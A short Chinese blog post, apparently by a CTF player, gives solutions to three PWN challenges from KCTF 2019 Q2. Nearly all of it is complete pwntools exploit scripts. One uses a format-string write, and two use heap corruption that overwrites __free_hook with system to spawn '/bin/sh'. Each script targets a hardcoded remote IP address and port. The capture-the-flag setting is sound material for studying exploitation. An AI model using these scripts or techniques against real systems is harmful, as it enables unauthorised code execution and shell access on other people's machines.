
KCTF 2019 Q2

2019-06-25  本文已影响4人  Kirin_say

好久没更东西了
前些天划了一下看雪
好像比上次水,做课设抽空做了PWN,三道都比较简单
除去课设时间,拿到题后基本都是秒的

金字塔的诅咒

from pwn import *

# Dump every byte sent/received; handy while the offsets are being tuned.
context(log_level="debug")
def s(note):
  """Select menu item 1 and send *note* verbatim at the "say:" prompt.

  No newline is appended to *note* (sendafter, not sendlineafter), which
  matters for the format-string payloads the caller builds.  Uses the
  module-level connection ``p``.
  """
  io = p
  io.sendlineafter("Choice:", "1")
  io.sendafter("say:", note)
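#p=process("./format")
p = remote("152.136.18.34", 9999)

# --- Leak phase --------------------------------------------------------------
# Each request goes through s() (menu item 1); the reply is read as 8 hex
# digits, i.e. a 32-bit value printed by %lx.  int(..., 16) accepts the raw
# bytes directly, so this runs under both Python 2 and Python 3 pwntools.
# NOTE(review): recv(8) is a fixed-width read.  %lx prints a value with
# leading zeros shorter than 8 digits, in which case the read would swallow
# part of the next prompt.  Fine for this target, fragile in general.
s("%3$lx")
addr = int(p.recv(8), 16)        # pointer into the (PIE) binary, rebased below
s("%5$lx")
stack_addr = int(p.recv(8), 16)  # pointer into the stack
s("%11$lx")
# Rebase to the libc base using deltas observed in a local run; they only
# hold for the libc build used there.
libc_addr = int(p.recv(8), 16) - 0xf7e13637 + 0xf7dfb000
print(hex(addr))
print(hex(stack_addr))
print(hex(libc_addr))

# --- Rebase the leaks onto the write value / write location ------------------
# Same local-run deltas: build-specific, recompute for any other build.
addr = addr + 0x5655700c - 0x565558f3 + 16
stack_addr = stack_addr + 0xffffcf40 - 0xffffcff4

# --- Write `addr` (32 bits) to stack_addr, one halfword at a time -----------
# "%<n>c%5$hn" prints n characters and stores the low 16 bits of the output
# count through the pointer printf finds in argument 5; "%53$hn" does the same
# through argument 53.  The slot argument 5 points at is presumably the one
# printf reads as argument 53, so the two %5$hn writes aim argument 53 at
# stack_addr and stack_addr+2, and the two %53$hn writes assemble `addr` there.
s("%" + str(stack_addr & 0xffff) + "c%5$hn")
s("%" + str(addr & 0xffff) + "c%53$hn")
s("%" + str((stack_addr & 0xffff) + 2) + "c%5$hn")
s("%" + str(addr >> 16) + "c%53$hn")

# Final message: 12 bytes of padding followed by a libc address.  0x3a819 is an
# offset into the leaked libc (a one-gadget-style target, presumably) and must
# be recomputed for any other libc.  A bytes literal keeps the p64()
# concatenation valid under Python 3.
s(b"a" * 12 + p64(libc_addr + 0x3a819))
#gdb.attach(p)
p.interactive()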

绝地逃生

from pwn import *

#context.log_level="debug"
def new(index, size, note):
   """Menu 1: allocate slot *index* with *size* bytes and fill it with *note*.

   *note* is sent verbatim (no newline appended); callers that want the
   input terminated include the "\\n" themselves.  Uses the module-level
   connection ``p``.
   """
   answers = (
      (">>> ", "1"),
      ("Index: ", str(index)),
      ("Size: ", str(size)),
   )
   for prompt, reply in answers:
      p.sendlineafter(prompt, reply)
   p.sendafter("Contents: ", note)
def delete(r, num):
   """Menu 2: free the slots named by the range string *r* (e.g. "200-255").

   *num* is the "Number of workers" answer; it is converted with str() so
   either an int or a string may be passed.  Uses the module-level ``p``.
   """
   io = p
   workers = str(num)
   io.sendlineafter(">>> ", "2")
   io.sendlineafter("Index range: ", r)
   io.sendlineafter("Number of workers: ", workers)
def show(index):
   """Menu 3: ask the binary to print slot *index*; the caller reads the reply."""
   answers = ((">>> ", "3"), ("Index: ", str(index)))
   for prompt, reply in answers:
      p.sendlineafter(prompt, reply)

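#p=process("./fastheap")
p = remote("152.136.18.34", 10000)

# Fill slots 0..254 with 0x68-byte allocations.  The print keeps the long
# allocation loop visible over a slow link.
for i in range(0, 255):
    print(i)
    new(i, 0x68, "kirin\n")
#gdb.attach(p)

# Free a range through the challenge's ranged delete, then read slot 0 back:
# its first 6 bytes are taken as a heap pointer left in freed memory.
# NOTE(review): "200-255" names slot 255, which was never allocated above;
# whether that is accepted depends on the binary's range handling.
delete("200-255", 8)
show(0)
heap_addr = u64(p.recv(6).ljust(8, b"\x00"))  # pad to 8 bytes; py2/py3 safe
print(hex(heap_addr))

delete("2-3", 1)
delete("0-1", 1)
# Rebase the leaked pointer with deltas from a local run (valid only for the
# same heap layout) and write it into the freed chunks' user data, presumably
# as a forward pointer so that later allocations overlap.  The trailing "\n"
# mirrors the other contents; bytes keep p64() concatenation valid on py3.
target = heap_addr - 0x5555557572c0 + 0x55555575eae0 + 0x10
new(200, 0xf0, p64(target) + b"\n")
new(201, 0x20, "aaaa\n")
new(202, 0x68, p64(target) + b"\n")
new(203, 0x68, "aaaa\n")
new(204, 0x68, "aaaa\n")
new(205, 0x68, "bbbb\n")
delete("200-201", 1)
show(205)
# After freeing 200-201, slot 205 shows a libc pointer; rebase it to the libc
# base with local-run deltas (libc-build specific).
libc_addr = u64(p.recv(6).ljust(8, b"\x00")) + 0x7ffff77c5000 - 0x7ffff7bb0ca0
print(hex(libc_addr))

# The two offsets below belong to the target's libc build (they look like
# glibc 2.27's __free_hook and system) -- recompute them for any other libc.
new(211, 0xf0, p64(libc_addr + 0x3ed8e8) + b"\n")  # steer a free-list entry at __free_hook
new(212, 0x68, "/bin/sh\n")
new(213, 0x68, p64(libc_addr + 0x4f440) + b"\n")   # that allocation lands on __free_hook -> system
delete("212-213", 1)  # freeing the "/bin/sh" slot now calls system()
#delete("2-3",3)

p.interactive()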

沉睡的敦煌

from pwn import *

# Dump every byte sent/received; handy while the offsets are being tuned.
context.update(log_level="debug")
def new(index, note):
   """Menu 1: allocate slot *index* and fill it with *note* (sent verbatim).

   The menu is recognised by its last line "4.show\\n".  Uses the
   module-level connection ``p``.
   """
   answers = (("4.show\n", "1"), ("index:\n", str(index)))
   for prompt, reply in answers:
      p.sendlineafter(prompt, reply)
   p.sendafter("content:\n", note)
def delete(index):
   """Menu 2: free slot *index*.  Uses the module-level connection ``p``."""
   io = p
   io.sendlineafter("4.show\n", "2")
   io.sendlineafter("index:\n", str(index))
def edit(index, note):
   """Menu 3: overwrite slot *index* with *note* (sent verbatim, no newline).

   Uses the module-level connection ``p``.
   """
   answers = (("4.show\n", "3"), ("index:\n", str(index)))
   for prompt, reply in answers:
      p.sendlineafter(prompt, reply)
   p.sendafter("content:\n", note)

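#p=process("./pwn")
p = remote("152.136.18.34", 10001)

# Slot 0 is allocated by hand because the binary prints a heap address
# ("gift: ...") before asking for the content.  int(..., 16) takes the raw
# bytes (with or without a 0x prefix), so this works on py2 and py3.
p.sendlineafter("4.show\n", "1")
p.sendlineafter("index:\n", "0")
p.recvuntil("gift: ")
heap_addr = int(p.recvuntil("\n").strip(), 16)
p.sendafter("content:\n", "aaaa")

# Slots 1..18: each starts with a fake chunk header (prev_size 0, size 0x21)
# so forged pointers used below find valid-looking 0x20 chunks.
for i in range(18):
    new(1 + i, p64(0) + p64(0x21))
# Slots 7..0, descending: refill with 0x28 bytes of padding and one 0xf1
# byte.  Presumably that byte overwrites the low byte of the following
# chunk's size field.  Must be a bytes literal: a str "\xf1" would be
# UTF-8-encoded to two bytes by Python 3 pwntools.
for i in range(8):
    delete(7 - i)
    new(7 - i, b"a" * 0x28 + b"\xf1")
# Slot 11: fake header plus two pointers into the binary's data segment
# (0x4040c0/0x4040c8 are non-PIE addresses) and another 0xf1 size byte.
delete(11)
new(11, p64(0) + p64(0x21) + p64(0x4040c0) + p64(0x4040c8) + p64(0x20) + b"\xf1")

# Release slots 1..7 and 12, then take fresh slots from the freed memory.
for i in range(7):
    delete(i + 1)
delete(12)
new(20, "aaaa")
new(21, "aaaa")
new(25, "aaaa")
new(26, "aaaa")
new(27, "aaaa")
delete(20)
delete(21)
delete(13)
# Write a heap address (the gift rebased with a local-run delta) into a freed
# chunk -- presumably its forward pointer -- then allocate twice so the second
# allocation lands there and receives a fake 0x31 header plus two pointers
# into the binary's data.
new(21, p64(heap_addr - 0x4052a0 + 0x405260))
new(22, "aaaa")
new(23, p64(0) + p64(0x31) + p64(0x404048) + p64(0x404050) + p64(0))
delete(27)
delete(14)
delete(25)
# Same trick, 0x20 bytes further into the heap.
new(14, p64(heap_addr - 0x4052a0 + 0x405260 + 0x20))
new(25, "aaaa")
new(20, p64(0) * 2 + p64(0x30) + p64(0xf0))
delete(25)
delete(15)
delete(26)
# And once more, this time aiming at the binary's data segment (0x404170).
new(30, p64(0x404170))
new(25, "aaaaaaaa")
delete(0)
new(31, p64(0x404170) * 3 + b"a" * 8)
# Slot 31 presumably overlaps the binary's slot table: editing it to 0x404040
# repoints slot 30, and "show" on slot 30 then dumps the 8 bytes at 0x404040
# (a libc pointer).  Rebase with local-run deltas (libc-build specific).
edit(31, p64(0x404040))
p.sendlineafter("4.show\n", "4")
p.sendlineafter("index:\n", "30")
libc_addr = u64(p.recv(6).ljust(8, b"\x00")) + 0x7ffff79e4000 - 0x7ffff7dd0680
print(hex(libc_addr))
# Offsets belong to the target's libc build (they look like glibc 2.27's
# __free_hook and system); recompute for any other libc.
edit(31, p64(libc_addr + 0x03ed8e8))  # slot 30 -> __free_hook
edit(30, p64(libc_addr + 0x4f440))    # __free_hook = system
edit(25, b"/bin/sh\x00")
delete(25)                            # free("/bin/sh") -> system("/bin/sh")
#gdb.attach(p)
p.interactive()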